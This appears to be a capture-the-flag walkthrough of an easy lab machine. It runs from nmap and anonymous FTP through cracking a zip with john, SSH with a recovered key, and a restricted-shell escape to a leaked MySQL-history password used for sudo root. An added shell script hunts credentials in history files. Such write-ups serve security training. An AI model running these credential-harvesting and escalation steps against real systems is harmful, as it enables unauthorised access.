RATING
Easy
ENUMERATION
Kicking things off with our usual nmap scan:
Command: nmap -sV -sC -T4 -Pn -p- 192.168.201.107

We can see from our nmap scan that anonymous FTP login is allowed, so we log in as anonymous (any string is accepted as the password):
Command: ftp anonymous@192.168.201.107

We download all of the zip files to our local machine for further examination:
Command: prompt (disables confirmation prompts)
Command: mget *.zip

Over on our local machine, we find that tom.zip is the only one that bears fruit. Because it is password protected, we convert it to a hash with zip2john and crack that hash with john. Once cracked (john's --show option prints the recovered password), we extract the archive and find an id_rsa private key inside:
Command: zip2john tom.zip > tom.hash
Command: john --wordlist=rockyou.txt tom.hash

EXPLOITATION
We can use this id_rsa to SSH to the target machine as user tom. SSH refuses to use a private key with permissive file modes, so we restrict it to the owner first:
Command: chmod 600 id_rsa
Command: ssh -i id_rsa tom@192.168.201.107

Once logged in as tom, we find that we cannot change directories because we have landed in a restricted shell. The easiest way out is to log back out and append -t "bash --noprofile" to our SSH command: the restricted shell executes bash from PATH, the new bash is unrestricted, and --noprofile skips the login scripts that would otherwise reapply the restrictions:
Command: ssh -i id_rsa tom@192.168.201.107 -t "bash --noprofile"

PRIVILEGE ESCALATION
Once logged back in, we are able to change directories. Listing the contents of tom’s home folder, we discover a .mysql_history file:
Command: ls -la

Viewing the contents of this file reveals the command insert\040into\040support\040(tom,\040xx11yy22!); (the mysql client records each statement on one line and encodes spaces as the octal escape \040, so this reads insert into support (tom, xx11yy22!);). The value xx11yy22! looks a lot like a password:
Command: cat .mysql_history
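Reading escaped history by eye works for one line, but a real .mysql_history can hold hundreds. The following POSIX shell snippet is an added example, not part of the original writeup: it decodes the \NNN octal escapes the mysql client writes (\040 space, \011 tab, \012 newline) and filters for the statements that tend to carry credentials. The sample history and the /home/tom/.mysql_history path are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original writeup): decode ~/.mysql_history
# escapes and surface credential-bearing statements.

# The mysql client stores one statement per line and encodes whitespace as
# three-digit octal escapes (\040 = space, \011 = tab, \012 = newline).
decode_mysql_history() {
    # Rewrite each \NNN as \0NNN so printf %b decodes exactly three octal
    # digits and cannot swallow a literal digit that follows the escape
    # (otherwise "limit\0401" would be misread as octal 401 instead of " 1").
    sed 's/\\\([0-7][0-7][0-7]\)/\\0\1/g' |
    while IFS= read -r line || [ -n "$line" ]; do
        printf '%b\n' "$line"
    done
}

# Keep only decoded statements that commonly embed secrets: INSERTs into
# user/support-style tables, CREATE USER/GRANT ... IDENTIFIED BY, PASSWORD().
find_credential_statements() {
    decode_mysql_history | grep -i -E 'identified by|password\(|insert into'
}

# Constructed sample history; stands in for /home/tom/.mysql_history (assumed path).
SAMPLE_HISTORY='show\040databases;
use\040support;
insert\040into\040support\040(tom,\040xx11yy22!);
select\040*\040from\040support;'

# Usage on a real target:  find_credential_statements < /home/tom/.mysql_history
printf '%s\n' "$SAMPLE_HISTORY" | find_credential_statements
```

Run on the sample, it prints only the insert statement, with xx11yy22! in the clear; grep's pattern list is deliberately short and should be extended for the schema of whatever application the target runs.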

tom reused xx11yy22! as his own account password, so it satisfies sudo's password prompt. sudo su drops us into a root shell, from which we read proof.txt:
Command: sudo su
